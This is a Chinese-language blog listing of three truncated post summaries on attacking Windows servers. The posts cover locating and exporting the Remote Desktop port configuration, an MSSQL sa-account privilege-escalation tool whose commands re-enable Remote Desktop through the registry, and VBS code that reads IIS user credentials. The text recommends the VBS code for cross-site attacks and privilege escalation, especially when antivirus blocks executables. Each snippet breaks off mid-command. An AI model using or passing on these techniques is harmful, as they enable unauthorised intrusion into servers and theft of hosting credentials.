摘要:
找终端: 第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! 而终端所对应的服务名为:TermService 第二步:用netstat -ano命令,列出所有端口对应的PID值! 找到PID值所对应的端口1.通用方法regedit /e c:\3389.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"type c:\3389.reg | find "PortNumber"del c:\338 阅读全文
摘要:
此版本集成了更多的1433服务器恢复提权命令功能,对于目前sa口令许多的功能限制能有效的恢复.如果此版本不能恢复的,建议可以考虑放弃该服务器的提权.版权为原作者所有,特此声明命令集成功能说明:查看系统信息systeminfo查看系统终端端口状况REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\WinStations\RDP-Tcp /v PortNumber开启系统终端端口REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDen 阅读全文
摘要:
能读取到iis用户和密码,对跨站或者提权是有帮助的!像星外的虚拟主机。有时候exe无法运行或者被杀毒软件K的话用VBS试试。挺简单的代码。代码如下:Set ObjService=GetObject("IIS://LocalHost/W3SVC") For Each obj3w In objservice childObjectName=replace(obj3w.AdsPath,Left(obj3w.Adspath,22),"") if IsNumeric(childObjectName)=true then set IIs=objservice.Get 阅读全文
